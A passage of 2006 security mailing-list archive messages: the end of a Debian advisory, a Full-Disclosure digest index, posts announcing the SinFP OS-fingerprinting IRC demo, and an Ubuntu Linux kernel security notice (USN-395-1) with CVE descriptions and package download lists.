Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/e/enemies-of-carlotta/enemies-of-carlotta_1.0.3.orig.tar.gz
    Size/MD5 checksum:    50970 c128776396562ef1c678e438422d11fb
  http://security.debian.org/pool/updates/main/e/enemies-of-carlotta/enemies-of-carlotta_1.0.3-1sarge1.dsc
    Size/MD5 checksum:      615 15c19c6a0ba8b3350f7ada9074713d12
  http://security.debian.org/pool/updates/main/e/enemies-of-carlotta/enemies-of-carlotta_1.0.3-1sarge1.diff.gz
    Size/MD5 checksum:     3587 c5e36788f3e1375c1f97533f1692de4a

Architecture independent packages:

  http://security.debian.org/pool/updates/main/e/enemies-of-carlotta/enemies-of-carlotta_1.0.3-1sarge1_all.deb
    Size/MD5 checksum:    42722 d78136bff713315256626eec51521c83


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFf/GVwM/Gs81MDZ0RAn4jAKCix0rudNOKLzx7KVBq8xxtU0wryACfS2PN
HRjdDPz/0i1ssaEXt00F+Ag=
=rmMW
-----END PGP SIGNATURE-----



From roger at rogerh.com  Wed Dec 13 12:21:14 2006
From: roger at rogerh.com (Roger Howorth)
Date: Wed, 13 Dec 2006 12:21:14 +0000
Subject: [Full-disclosure] [SPAM-1] Full-Disclosure Digest, Vol 22,
	Issue 17
Message-ID: <20061213123244.9AEFD48238@hpost2-login.rhoworth.local>



-----Original Message-----
From: full-disclosure-request at lists.grok.org.uk
To: full-disclosure at lists.grok.org.uk
Sent: 12/12/06 12:00
Subject: [SPAM-1] Full-Disclosure Digest, Vol 22, Issue 17

Send Full-Disclosure mailing list submissions to
	full-disclosure at lists.grok.org.uk

To subscribe or unsubscribe via the World Wide Web, visit
	https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
	full-disclosure-request at lists.grok.org.uk

You can reach the person managing the list at
	full-disclosure-owner at lists.grok.org.uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.


Today's Topics:

   1. [SBDA] - ColdFusion MX7 - Multiple Vulnerabilities (Brett Moore)
   2. Re: looking for security community input (Stack Smasher)
   3. Re: Another,	different MS Word 0-day vulnerability reported
      (Juha-Matti Laurio)
   4. ERRATA: [ GLSA 200612-03 ] GnuPG: Multiple	vulnerabilities
      (Raphael Marichez)
   5. Secunia Research: MailEnable IMAP Service Buffer	Overflow
      Vulnerability (Secunia Research)
   6. Secunia Research: AOL CDDBControl ActiveX	Control
      "SetClientInfo()" Buffer Overflow (Secunia Research)


----------------------------------------------------------------------

Message: 1
Date: Mon, 11 Dec 2006 11:35:25 +1300
From: "Brett Moore" 
Subject: [SPAM-1] [Full-disclosure] [SBDA] - ColdFusion MX7 - Multiple
	Vulnerabilities
To: 
Message-ID: <3F6918F2F2125C4BB95462A2ED1454B10DE827 at pukeko.smb2go.net>
Content-Type: text/plain;	charset="us-ascii"

Just clearing stuff out before Christmas.

========================================================================
= ColdFusion MX7 - Multiple Vulnerabilities
=
= Vendor Website:  
= http://www.Adobe.com
=
= Affected Software:
=       ColdFusion MX7 (and possibly MX6)
=
= Public disclosure on Monday December 11, 2006
========================================================================


From fd at gomor.org  Wed Dec 13 12:35:30 2006
From: fd at gomor.org (GomoR)
Date: Wed, 13 Dec 2006 13:35:30 +0100
Subject: [Full-disclosure] SinFP OS fingerprinting online demo
In-Reply-To: 
References: 
Message-ID: <20061213123530.GA30279@oshima.enslaved.lan>

Hello,

SinFP is a new approach to OS fingerprinting, which bypasses 
limitations that nmap has.

I put an online demo in the form of an IRC bot, available 
at #sinfp on irc.perl.org.

Example usage:
[..]
 sinfp ?
 GomOP: usage: sinfp HOSTNAME:PORT
 sinfp www.openbsd.org:21
 GomOP: SunOS: 5.6 (BH0FH0WH2OH0MH1/P1P2P3)
[..]

I do not think it will last forever, so try it quickly ;)

Best regards,

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/          Systems & Security Engineer         |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+



From fd at gomor.org  Wed Dec 13 15:08:39 2006
From: fd at gomor.org (fd at gomor.org)
Date: Wed, 13 Dec 2006 16:08:39 +0100
Subject: [Full-disclosure] SinFP OS fingerprinting online demo
In-Reply-To: <20061213123530.GA30279@oshima.enslaved.lan>
References: 
	<20061213123530.GA30279@oshima.enslaved.lan>
Message-ID: <20061213150839.GA3572@oshima.enslaved.lan>

Sorry, I forgot to mention that a benchmark versus Nmap has 
been done by someone on his blog:

http://www.computerdefense.org/?p=173

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/          Systems & Security Engineer         |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+



From martin.pitt at canonical.com  Wed Dec 13 15:46:35 2006
From: martin.pitt at canonical.com (Martin Pitt)
Date: Wed, 13 Dec 2006 16:46:35 +0100
Subject: [Full-disclosure] [USN-395-1] Linux kernel vulnerabilities
Message-ID: <20061213154635.GC14077@piware.de>

=========================================================== 
Ubuntu Security Notice USN-395-1          December 13, 2006
linux-source-2.6.12/-2.6.15/-2.6.17 vulnerabilities
CVE-2006-4572, CVE-2006-4813, CVE-2006-4997, CVE-2006-5158,
CVE-2006-5173, CVE-2006-5619, CVE-2006-5648, CVE-2006-5649,
CVE-2006-5701, CVE-2006-5751
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  linux-image-2.6.12-10-386                2.6.12-10.42
  linux-image-2.6.12-10-686                2.6.12-10.42
  linux-image-2.6.12-10-686-smp            2.6.12-10.42
  linux-image-2.6.12-10-amd64-generic      2.6.12-10.42
  linux-image-2.6.12-10-amd64-k8           2.6.12-10.42
  linux-image-2.6.12-10-amd64-k8-smp       2.6.12-10.42
  linux-image-2.6.12-10-amd64-xeon         2.6.12-10.42
  linux-image-2.6.12-10-k7                 2.6.12-10.42
  linux-image-2.6.12-10-k7-smp             2.6.12-10.42
  linux-image-2.6.12-10-powerpc            2.6.12-10.42
  linux-image-2.6.12-10-powerpc-smp        2.6.12-10.42
  linux-image-2.6.12-10-powerpc64-smp      2.6.12-10.42
  linux-image-2.6.12-10-sparc64            2.6.12-10.42
  linux-image-2.6.12-10-sparc64-smp        2.6.12-10.42
  linux-patch-ubuntu-2.6.12                2.6.12-10.42

Ubuntu 6.06 LTS:
  linux-image-2.6.15-27-386                2.6.15-27.50
  linux-image-2.6.15-27-686                2.6.15-27.50
  linux-image-2.6.15-27-amd64-generic      2.6.15-27.50
  linux-image-2.6.15-27-amd64-k8           2.6.15-27.50
  linux-image-2.6.15-27-amd64-server       2.6.15-27.50
  linux-image-2.6.15-27-amd64-xeon         2.6.15-27.50
  linux-image-2.6.15-27-k7                 2.6.15-27.50
  linux-image-2.6.15-27-powerpc            2.6.15-27.50
  linux-image-2.6.15-27-powerpc-smp        2.6.15-27.50
  linux-image-2.6.15-27-powerpc64-smp      2.6.15-27.50
  linux-image-2.6.15-27-server             2.6.15-27.50
  linux-image-2.6.15-27-server-bigiron     2.6.15-27.50
  linux-image-2.6.15-27-sparc64            2.6.15-27.50
  linux-image-2.6.15-27-sparc64-smp        2.6.15-27.50
  linux-source-2.6.15                      2.6.15-27.50

Ubuntu 6.10:
  linux-image-2.6.17-10-386                2.6.17.1-10.34
  linux-image-2.6.17-10-generic            2.6.17.1-10.34
  linux-image-2.6.17-10-powerpc            2.6.17.1-10.34
  linux-image-2.6.17-10-powerpc-smp        2.6.17.1-10.34
  linux-image-2.6.17-10-powerpc64-smp      2.6.17.1-10.34
  linux-image-2.6.17-10-server             2.6.17.1-10.34
  linux-image-2.6.17-10-server-bigiron     2.6.17.1-10.34
  linux-image-2.6.17-10-sparc64            2.6.17.1-10.34
  linux-image-2.6.17-10-sparc64-smp        2.6.17.1-10.34

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

Mark Dowd discovered that the netfilter iptables module did not
correcly handle fragmented packets. By sending specially crafted
packets, a remote attacker could exploit this to bypass firewall
rules. This has only be fixed for Ubuntu 6.10; the corresponding fix
for Ubuntu 5.10 and 6.06 will follow soon. (CVE-2006-4572)

Dmitriy Monakhov discovered an information leak in the
__block_prepare_write() function. During error recovery, this function
did not properly clear memory buffers which could allow local users to
read portions of unlinked files. This only affects Ubuntu 5.10.
(CVE-2006-4813)

ADLab Venustech Info Ltd discovered that the ATM network driver
referenced an already released pointer in some circumstances. By
sending specially crafted packets to a host over ATM, a remote
attacker could exploit this to crash that host. This does not affect
Ubuntu 6.10. (CVE-2006-4997)

Matthias Andree discovered that the NFS locking management daemon
(lockd) did not correctly handle mixing of 'lock' and 'nolock' option
mounts on the same client. A remote attacker could exploit this to
crash lockd and thus rendering the NFS imports inaccessible. This only
affects Ubuntu 5.10. (CVE-2006-5158)

The task switching code did not save and restore EFLAGS of processes.
By starting a specially crafted executable, a local attacker could
exploit this to eventually crash many other running processes. This
does not affect Ubuntu 6.10. (CVE-2006-5173)

James Morris discovered that the ip6fl_get_n() function incorrectly
handled flow labels. A local attacker could exploit this to crash the
kernel. (CVE-2006-5619)

Fabio Massimo Di Nitto discovered that the sys_get_robust_list and
sys_set_robust_list system calls lacked proper lock handling on the
powerpc platform. A local attacker could exploit this to create
unkillable processes, drain all available CPU/memory, and render the
machine unrebootable. This only affects Ubuntu 6.10.  (CVE-2006-5648)

Fabio Massimo Di Nitto discovered a flaw in the alignment check
exception handling on the powerpc platform. A local attacker could
exploit this to cause a kernel panic and crash the machine.
(CVE-2006-5649)

Certain corrupted squashfs file system images caused a memory
allocation to be freed twice. By mounting a specially crafted squashfs
file system, a local attacker could exploit this to crash the kernel.
This does not affect Ubuntu 5.10. (CVE-2006-5701)

An integer overflow was found in the get_fdb_entries() function of the
network bridging code. By executing a specially crafted ioctl, a local
attacker could exploit this to execute arbitrary code with root
privileges. (CVE-2006-5751)


Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12-10.42.diff.gz
      Size/MD5:  7996670 cf5dc02fae9611e53769692ddd61a6bd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12-10.42.dsc
      Size/MD5:     2514 82225edd474b2a973467b5acadfc18d0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12.orig.tar.gz
      Size/MD5: 47177098 9272115d4005d4e9773a1a6170fd20cd

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-doc-2.6.12_2.6.12-10.42_all.deb
      Size/MD5:  4556332 c2891f73150dcabb22eceb5315eed3a5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-source-2.6.12_2.6.12-10.42_all.deb
      Size/MD5: 40453572 e3657bf359717809fc78706dce699344
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-tree-2.6.12_2.6.12-10.42_all.deb
      Size/MD5:   377892 fab046e194f4b015996144915e6186b8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/acpi-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    20802 174391691d37bae2751deb0d03c0e313
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/cdrom-core-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    45614 47861cc882767de5acb7b0833205637f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/crc-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:     2316 1149916d1c4d9b374f08bc7b554c8787
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ext3-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    88802 f0db5e0807f30e0dedd9a46eea8842dc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fat-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    35150 d1b02ba6cd4eddd2fc183135081bb779
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fb-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    42374 7cfb720b2e412b5221f72f96c9c2ae7b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firewire-core-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    70526 e00f96b7c9d28445b540b64a9ea3456c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firmware-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:     5742 48f939490c8fe5b6f71f8166999ac7de
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/floppy-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    34336 fa5547ddbe8877ad3bc71d5d321c5ffe
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-core-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    53484 1e882eb6c13cc5eed9964b61d3a23510
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   129586 6ba5d2c7754359460517213b5a67af96
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/input-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    43844 503a32d844501f4fd8db2ba3a886dd12
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ipv6-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   115022 9ad4091ed18b76574240682cc8752a7a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/irda-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   253676 74ea601344bec59d421703defc457aba
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/jfs-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    83362 dff6f4dab7bfabc2d024f8549b2fae2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/kernel-image-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:  1497908 bfe8a817b54e0db128d4f31ddcfd30d2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-amd64-generic_2.6.12-10.42_amd64.deb
      Size/MD5:   805594 764a68c019e26e02724d542e9f91d15f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-amd64-k8-smp_2.6.12-10.42_amd64.deb
      Size/MD5:   803248 fce377f28d17f09cc16b4b878be1e14d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-amd64-k8_2.6.12-10.42_amd64.deb
      Size/MD5:   804276 07f6a77e0366a2a19e014bed1d8d84c9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-amd64-xeon_2.6.12-10.42_amd64.deb
      Size/MD5:   800548 ca59f8ae10209a8c590981389f896aff
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10_2.6.12-10.42_amd64.deb
      Size/MD5:  5920912 9119fada50e947315ddf112a85b00e88
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-amd64-generic_2.6.12-10.42_amd64.deb
      Size/MD5: 17089626 f6efc5e1d11ce8361e55573e8c2cc723
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-amd64-k8-smp_2.6.12-10.42_amd64.deb
      Size/MD5: 18130130 4bb5c0dbd6c875fc9a51c92909a5b531
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-amd64-k8_2.6.12-10.42_amd64.deb
      Size/MD5: 17954466 4115f168870a86221e0b2f1e4192d569
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-amd64-xeon_2.6.12-10.42_amd64.deb
      Size/MD5: 17898598 a1edca1979d46e27d14310629e8ac826
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-patch-ubuntu-2.6.12_2.6.12-10.42_amd64.deb
      Size/MD5:  3518982 5aa804ecb3953a92826a3870c7fa1a53
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/loop-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    14298 0dba0da149b08fdf537bf6f039d9c482
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/md-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   191796 eb28692ea3dd42451bbe285d1924fc62
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nfs-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   170370 6366fd51f949ac22bbedb5513342f063
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-firmware-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:  1048480 7daad4617b59d60e0d76c90a17be398e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:  1147240 8dfc2daa00ffd29d53050b8dff3f1ba1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-pcmcia-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   122450 7235be1f909b8da51e21106479fa7dd0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-shared-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:     8540 4fccc8ddbe42613187af04ceba1d6fdb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-usb-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    99022 5e3bb61250dad10be385a3e390a04fd8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ntfs-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    44950 296b05542345bcb0815f3f66faa7a95c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/parport-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    31658 9563e7efd932530ac290d2e98420b782
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    65704 4d35a7b40f33cf9c368056303cef71f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-storage-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:     4474 1c5719b4c2fe8e94fd6b69c7ccc6ad08
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/plip-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:     7878 946e51582bd50d1e06ede4f5c58d7dbb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ppp-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    53862 ead873e96f96f5b39ee3adc6696b3a14
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/reiserfs-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   107330 162466819ae26843dee70d4c716dbe45
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/rtc-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:     9882 ccd4c123413006f543a63ef0f5d78c74
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/sata-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    69766 ec3408b56b83728724978e2b99707af4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-core-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    73066 948b6196ee5b32d9ccced7d16a0973bc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:  1271102 94a10f4df65e9d192579671dd0c08721
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/serial-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    58386 7e844a8708af648bdc78f48247400241
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/socket-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    22208 2df7f3b906c3d85e219b648e09fa1e12
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.12/ufs-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    29362 6ca1aca586a7ea76f9c353656836c9e7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    62192 a8d5f8a183732aa70377f7aa3f90bc4f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-storage-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:    34968 fd9441cc6dc544df6685c11f89c4b55b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/xfs-modules-2.6.12-10-amd64-generic-di_2.6.12-10.42_amd64.udeb
      Size/MD5:   248874 a9d78af942387dc2a34f487fc39a7641

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/acpi-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    18670 282faedaba32a8614d28fcf6ceeb51a2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/cdrom-core-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    43952 a83dab8b68a58acb55333b49e32c18df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/cdrom-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    96876 e2fd9197888379f145fddca447799e74
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/crc-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:     2282 361c7f3c5587952c6b97b40ed10ec1b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ext3-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    83696 c6dcdef5512706f4152cd6349b26b451
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fat-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    33138 89c8c6005a0ab14e866b085b934da299
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fb-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    41922 1cd10cefd4c3ce0b872e0f42b81305c5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firewire-core-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    68224 4043ff633a6c4100ec01ff6c44af510a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firmware-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:     5364 f7ab5aef70d78d149bfc76b96442a43d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/floppy-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    31130 a0772d958779b578f392fdcf977b15ea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-core-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    51414 1a5e00a82029c1cfdb21205ded7c86f3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   123404 03657641ce80dd8562628f58f578957d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/input-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    42476 82ee5104fb6032f3d75ce67e5ce1c302
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ipv6-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   110272 3149f7469c13b148c41a264a69713f1c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/irda-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   239810 cac617491285b498c4e93aeb1a5f7882
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/jfs-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    86178 63f4e48d04aca8dde6a2af41c8f9a528
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/kernel-image-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:  1417982 dadb3d982841b1729d3cdf60deabb432
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-386_2.6.12-10.42_i386.deb
      Size/MD5:   803632 5707cfb421bf6d31a6f9fb5817e439c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-686-smp_2.6.12-10.42_i386.deb
      Size/MD5:   798802 ecc08d47f86d5ec2618140e2f4574219
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-686_2.6.12-10.42_i386.deb
      Size/MD5:   800820 65596dae3db2c89a03f4015568236705
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-k7-smp_2.6.12-10.42_i386.deb
      Size/MD5:   799018 7a810a489e2b4f56838ec4fe60ada408
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-k7_2.6.12-10.42_i386.deb
      Size/MD5:   801354 f128651288da2445944fbcbbc17d6446
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10_2.6.12-10.42_i386.deb
      Size/MD5:  5930424 3dcb88ab6d0288128d58a1597237aca5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-386_2.6.12-10.42_i386.deb
      Size/MD5: 18025902 9b5fc7e072b6457c9b3a081526610209
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-686-smp_2.6.12-10.42_i386.deb
      Size/MD5: 19370088 7b4c84d1ede12aaceccd89d023a89f91
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-686_2.6.12-10.42_i386.deb
      Size/MD5: 19463586 c7e21ceefb50104105d9cc44a7be9344
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-k7-smp_2.6.12-10.42_i386.deb
      Size/MD5: 19501644 60d0e68a8d2767ea911b755e992c407c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-k7_2.6.12-10.42_i386.deb
      Size/MD5: 19546962 813e43078c3a2f56ebaf749c45ca4a8f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-patch-ubuntu-2.6.12_2.6.12-10.42_i386.deb
      Size/MD5:  3519684 55b033208533519d8b44962bf32db5ed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/loop-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    14530 1e59ff286d1a8675978c3c5803a84a66
